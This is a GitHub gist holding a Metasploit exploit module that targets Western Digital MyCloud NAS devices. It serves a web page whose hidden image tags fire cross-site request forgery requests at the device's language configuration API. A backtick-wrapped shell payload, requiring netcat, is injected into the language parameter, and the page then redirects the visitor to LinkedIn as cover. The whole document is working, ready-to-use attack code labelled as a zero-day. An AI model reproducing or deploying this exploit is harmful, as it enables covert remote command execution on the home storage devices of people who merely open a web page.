Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save carnal0wnage/dfb534b0fdea3e2bb339 to your computer and use it in GitHub Desktop.
Save carnal0wnage/dfb534b0fdea3e2bb339 to your computer and use it in GitHub Desktop.
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'WDMyCloud NAS Command Injection CSRF',
'Description' => %q{
This module exploits a command injection vulnerability in the web interface
of the WDMyCloud NAS device, via CSRF. It will submit the CSRF request
to RHOST, as well as wdmycloud and wdmycloud.local.
},
'Author' => [ 'phikshun' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'NA', 'NA' ],
],
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat',
}
},
'Targets' =>
[
[ 'Automatic', { } ]
],
'Privileged' => false,
'DefaultTarget' => 0,
'DisclosureDate' => '0 day, yo'))
register_options([Opt::RHOST("192.168.1.100")], self.class)
end
def generate_html
params = "format=xml&rest_method=PUT&language=" + Rex::Text.uri_encode("`#{payload.encoded}`")
html = <<-EOS
<html>
<body>
<h1>Redirecting... Please Wait</h1>
<div style='display:none'>
<img src='http://wdmycloud.local/api/1.0/rest/language_configuration?#{params}' />
<img src='http://wdmycloud/api/1.0/rest/language_configuration?#{params}' />
<img src='http://#{datastore['RHOST']}/api/1.0/rest/language_configuration?#{params}' />
</div>
<script>
window.setTimeout(function(){
window.location = 'http://www.linkedin.com';
}, 5000);
</script>
</body>
</html>
EOS
end
def on_request_uri(cli, request)
print_status("Sending CSRF")
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
handler(cli)
end
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment